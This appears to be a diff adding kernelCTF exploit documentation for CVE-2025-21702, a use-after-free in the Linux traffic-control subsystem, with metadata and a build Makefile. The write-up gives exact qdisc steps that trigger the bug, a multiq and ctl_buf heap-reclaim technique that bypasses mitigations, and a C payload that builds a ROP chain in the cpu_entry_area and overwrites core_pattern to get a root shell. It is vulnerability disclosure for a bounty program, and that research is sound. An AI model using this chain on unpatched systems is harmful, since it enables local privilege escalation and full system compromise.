175 changes: 175 additions & 0 deletions pocs/linux/kernelctf/CVE-2025-21702_mitigation/docs/exploit.md
@@ -0,0 +1,175 @@
# Overview

The vulnerability is triggered when `pfifo_tail_enqueue()` runs on a qdisc whose `sch->limit` is 0 [1]. If the queue is empty, `__qdisc_queue_drop_head()` has no packet to drop and therefore does not decrease qlen [2]. `qdisc_enqueue_tail()` then increases qlen [3] and the function returns `NET_XMIT_CN`, so the parent qdisc does not count the packet. The result is a qlen imbalance between the pfifo and its parent qdisc.

```c
static int pfifo_tail_enqueue(struct sk_buff *skb, struct Qdisc *sch,
			      struct sk_buff **to_free)
{
	unsigned int prev_backlog;

	if (likely(sch->q.qlen < sch->limit))			// [1]
		return qdisc_enqueue_tail(skb, sch);

	prev_backlog = sch->qstats.backlog;
	/* queue full, remove one skb to fulfill the limit */
	__qdisc_queue_drop_head(sch, &sch->q, to_free);		// [2]
	qdisc_qstats_drop(sch);
	qdisc_enqueue_tail(skb, sch);				// [3]

	qdisc_tree_reduce_backlog(sch, 0, prev_backlog - sch->qstats.backlog);
	return NET_XMIT_CN;
}
```
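The accounting mismatch can be reproduced in a small user-space model. This is only a sketch, not kernel code: `toy_qdisc`, `toy_tail_enqueue()`, `toy_parent_enqueue()` and `toy_imbalance()` are hypothetical names, only the qlen counters are tracked, and the parent is assumed to count a packet only when the child returns success (as the CVE description states for `hfsc` and `drr`). The `fixed` flag models the behaviour named in the fix commit title, dropping the new packet when the limit is 0.

```c
#include <stdio.h>

/* Toy return codes standing in for NET_XMIT_SUCCESS / NET_XMIT_DROP / NET_XMIT_CN. */
enum { TOY_XMIT_SUCCESS = 0, TOY_XMIT_DROP = 1, TOY_XMIT_CN = 2 };

/* Hypothetical stand-in for struct Qdisc: only the counters matter here. */
struct toy_qdisc {
	unsigned int qlen;
	unsigned int limit;
};

/* Follows the control flow of pfifo_tail_enqueue() on counters only. */
static int toy_tail_enqueue(struct toy_qdisc *sch, int fixed)
{
	if (fixed && sch->limit == 0)
		return TOY_XMIT_DROP;	/* modelled fix: drop the new packet */

	if (sch->qlen < sch->limit) {
		sch->qlen++;
		return TOY_XMIT_SUCCESS;
	}

	if (sch->qlen > 0)
		sch->qlen--;		/* head drop; a no-op on an empty queue */
	sch->qlen++;			/* tail enqueue always counts the packet */
	return TOY_XMIT_CN;
}

/* Assumed parent behaviour: count the packet only on success. */
static int toy_parent_enqueue(struct toy_qdisc *parent,
			      struct toy_qdisc *child, int fixed)
{
	int ret = toy_tail_enqueue(child, fixed);

	if (ret == TOY_XMIT_SUCCESS)
		parent->qlen++;
	return ret;
}

/* Returns child qlen minus parent qlen after one enqueue with limit == 0. */
int toy_imbalance(int fixed)
{
	struct toy_qdisc parent = { 0, 0 };
	struct toy_qdisc child = { 0, 0 };

	toy_parent_enqueue(&parent, &child, fixed);
	printf("fixed=%d child.qlen=%u parent.qlen=%u\n",
	       fixed, child.qlen, parent.qlen);
	return (int)child.qlen - (int)parent.qlen;
}
```

In this model, `toy_imbalance(0)` leaves the child at qlen 1 while the parent stays at 0, and `toy_imbalance(1)` leaves both at 0.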

We can trigger the UAF as follows.

- Create a Qdisc DRR `1:`
- Create a Class DRR `1:1`
- Create a Qdisc DRR `2:` as a child of `1:1`
- Create a Class DRR `2:1`
- Create a Class DRR `2:2`
- Create a Qdisc PFIFO (`pfifo_head_drop`, with `limit` set to 0) `3:` as a child of `2:1`
- Create a Qdisc NetEM `4:` as a child of `2:2`

- Send a packet to `3:`

- Delete the Class DRR `2:1`

- Send a packet to `4:`

- Delete the Class DRR `1:1`

- Send a packet to trigger the UAF

# KASLR Bypass

We used a timing side channel attack to leak the kernel base.

# RIP Control

On the mitigation kernel, we use a multiq Qdisc to bypass the mitigations. We allocate the multiq Qdisc as `cl->qdisc`.

```c
static int multiq_init(struct Qdisc *sch, struct nlattr *opt,
		       struct netlink_ext_ack *extack)
{
	struct multiq_sched_data *q = qdisc_priv(sch);
	int i, err;

	q->queues = NULL;

	if (!opt)
		return -EINVAL;

	err = tcf_block_get(&q->block, &q->filter_list, sch, extack);
	if (err)
		return err;

	q->max_bands = qdisc_dev(sch)->num_tx_queues;

	q->queues = kcalloc(q->max_bands, sizeof(struct Qdisc *), GFP_KERNEL);	// [4]
	if (!q->queues)
		return -ENOBUFS;
	for (i = 0; i < q->max_bands; i++)
		q->queues[i] = &noop_qdisc;

	return multiq_tune(sch, opt, extack);
}
```

When the multiq Qdisc is initialized, `q->queues` is allocated in `multiq_init()` [4]. The size of this object is `q->max_bands * sizeof(struct Qdisc *)`. Since `q->max_bands` (taken from the device's `num_tx_queues` above) is a user-controllable value, an object of any desired size can be allocated. To bypass the mitigation, we allocate an object larger than `0x2000` bytes, which is served by the page allocator. We then delete the multiq Qdisc and allocate `ctl_buf` objects so that they reclaim the freed `q->queues`.

```c
static struct sk_buff *multiq_peek(struct Qdisc *sch)
{
	struct multiq_sched_data *q = qdisc_priv(sch);
	unsigned int curband = q->curband;
	struct Qdisc *qdisc;
	struct sk_buff *skb;
	int band;

	for (band = 0; band < q->bands; band++) {
		/* cycle through bands to ensure fairness */
		curband++;
		if (curband >= q->bands)
			curband = 0;

		/* Check that target subqueue is available before
		 * pulling an skb to avoid head-of-line blocking.
		 */
		if (!netif_xmit_stopped(
		    netdev_get_tx_queue(qdisc_dev(sch), curband))) {
			qdisc = q->queues[curband];
			skb = qdisc->ops->peek(qdisc);	// [5]
			if (skb)
				return skb;
		}
	}
	return NULL;
}
```

Next, when a packet is sent, `multiq_peek()` is called from `drr_dequeue()`. It reads a pointer from `q->queues` and calls `qdisc->ops->peek()` on it [5]. Using `ctl_buf`, we overwrite `q->queues[]` with an address inside the `cpu_entry_area`. As a result, `qdisc->ops` can also point into the `cpu_entry_area`, which gives us control of RIP.

# Post-RIP

For the mitigation kernel, the payload is stored in the `cpu_entry_area` as follows.

```c
// Fill the CPU entry area exception stack of HELPER_CPU with a
// struct cpu_entry_area_payload
static void setup_cpu_entry_area() {
    // The parent returns immediately; the child keeps refreshing the payload.
    if (fork()) {
        return;
    }

    struct cpu_entry_area_payload payload = {};

    payload.regs[0] = kbase + QDISC_RESET;                // multiq->ops->peek
    payload.regs[1] = kbase + POP_POP_RET;
    payload.regs[2] = kbase + PUSH_RBX_POP_RSP_RBP_RET;   // multiq->ops->reset
    payload.regs[3] = PAYLOAD_LOCATION(1) - PEEK_OFF;     // fake ops
    payload.regs[4] = kbase + POP_RDI_POP_RSI_POP_RDX_POP_RET;
    payload.regs[5] = kbase + CORE_PATTERN;
    payload.regs[6] = MMAP_ADDR;
    payload.regs[7] = strlen((char*)MMAP_ADDR);
    payload.regs[8] = 0;
    payload.regs[9] = kbase + COPY_FROM_USER;
    payload.regs[10] = kbase + MSLEEP;

    set_affinity(1);
    signal(SIGFPE, sig_handler);
    signal(SIGTRAP, sig_handler);
    signal(SIGSEGV, sig_handler);
    setsid();

    while (1) {
        write_cpu_entry_area(&payload);
        usleep(10000);
    }
}
```

Once RIP is controlled, `qdisc_reset()` is the first function called.

```c
void qdisc_reset(struct Qdisc *qdisc)
{
	const struct Qdisc_ops *ops = qdisc->ops;

	trace_qdisc_reset(qdisc);

	if (ops->reset)
		ops->reset(qdisc);	// [6]

	__skb_queue_purge(&qdisc->gso_skb);
	__skb_queue_purge(&qdisc->skb_bad_txq);

	qdisc->q.qlen = 0;
	qdisc->qstats.backlog = 0;
}
```

In `qdisc_reset()`, `ops->reset()` is called with the address of the `cpu_entry_area` in the `RBX` register [6]. Therefore, ROP can be performed by pointing `ops->reset` at a stack pivot gadget. The `core_pattern` overwrite technique is then used to gain a root shell.
@@ -0,0 +1,12 @@
- Requirements:
- Capabilities: CAP_NET_ADMIN, CAP_NET_RAW
- Kernel configuration: CONFIG_NET_SCHED
- User namespaces required: Yes
- Introduced by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=57dbb2d83d10 (sched: add head drop fifo queue)
- Fixed by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=647cef20e649c576dff271e018d5d15d998b629d (pfifo_tail_enqueue: Drop new packet when sch->limit == 0)
- Affected Version: v2.6.34 - v6.14-rc1
- Affected Component: net/sched
- Cause: Use-After-Free
- Syscall to disable: disallow unprivileged user namespaces
- URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2025-21702
- Description: In the Linux kernel, the following vulnerability has been resolved: pfifo_tail_enqueue: Drop new packet when sch->limit == 0 Expected behaviour: In case we reach scheduler's limit, pfifo_tail_enqueue() will drop a packet in scheduler's queue and decrease scheduler's qlen by one. Then, pfifo_tail_enqueue() enqueue new packet and increase scheduler's qlen by one. Finally, pfifo_tail_enqueue() return `NET_XMIT_CN` status code. Weird behaviour: In case we set `sch->limit == 0` and trigger pfifo_tail_enqueue() on a scheduler that has no packet, the 'drop a packet' step will do nothing. This means the scheduler's qlen still has value equal 0. Then, we continue to enqueue new packet and increase scheduler's qlen by one. In summary, we can leverage pfifo_tail_enqueue() to increase qlen by one and return `NET_XMIT_CN` status code. The problem is: Let's say we have two qdiscs: Qdisc_A and Qdisc_B. - Qdisc_A's type must have '->graft()' function to create parent/child relationship. Let's say Qdisc_A's type is `hfsc`. Enqueue packet to this qdisc will trigger `hfsc_enqueue`. - Qdisc_B's type is pfifo_head_drop. Enqueue packet to this qdisc will trigger `pfifo_tail_enqueue`. - Qdisc_B is configured to have `sch->limit == 0`. - Qdisc_A is configured to route the enqueued's packet to Qdisc_B. Enqueue packet through Qdisc_A will lead to: - hfsc_enqueue(Qdisc_A) -> pfifo_tail_enqueue(Qdisc_B) - Qdisc_B->q.qlen += 1 - pfifo_tail_enqueue() return `NET_XMIT_CN` - hfsc_enqueue() check for `NET_XMIT_SUCCESS` and see `NET_XMIT_CN` => hfsc_enqueue() don't increase qlen of Qdisc_A. The whole process lead to a situation where Qdisc_A->q.qlen == 0 and Qdisc_B->q.qlen == 1. Replace 'hfsc' with other type (for example: 'drr') still lead to the same problem. This violate the design where parent's qlen should equal to the sum of its childrens'qlen. Bug impact: This issue can be used for user->kernel privilege escalation when it is reachable.
@@ -0,0 +1,5 @@
exploit:
	gcc -o exploit ./exploit.c -lkeyutils -static

prerequisites:
	sudo apt-get install libkeyutils-dev
Binary file not shown.